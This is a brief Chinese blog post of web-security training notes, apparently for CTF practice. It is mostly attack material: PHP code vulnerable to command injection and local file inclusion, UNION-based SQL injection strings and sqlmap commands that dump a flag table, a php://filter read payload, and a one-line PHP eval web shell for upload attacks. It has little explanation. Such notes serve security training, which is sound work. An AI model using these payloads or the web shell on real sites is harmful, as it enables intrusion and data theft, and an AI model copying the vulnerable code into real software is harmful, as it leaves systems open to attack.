2021/12/7 WEB基础培训
作者:互联网
培训 WEB (略微提升)
1.exec
<?php
if (isset($_POST['target']))
{
system("ping -c 3 ".$_POST['target']);
}
?>
2.SQL注入
?id=1' order by 3--+
?id=-1' union select 1,database(),3--+
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note'--+
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g'--+
?id=-1' union select 1,2,group_concat(fllllag) from fl4g--+
sqlmap -u "url"
sqlmap -u "url" --dbs
sqlmap -u "url" -D note --tables
sqlmap -u "url" -D note -T fl3g --columns
sqlmap -u "url" -D note -T fl4g -C fllllag --dump
3.文件包含(LFI)
3.1
BUU
?P=/flag
<?php
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
?>
3.2 php伪协议
?p=php://filter/convert.base64-encode/resource=flag
4.文件上传
一句话
<?php @eval($_POST["x"]);?>
BUU
上传+文件包含
标签:sqlmap,WEB,12,url,BUU,2021,--+,id,select 来源: https://www.cnblogs.com/murkuo/p/15652722.html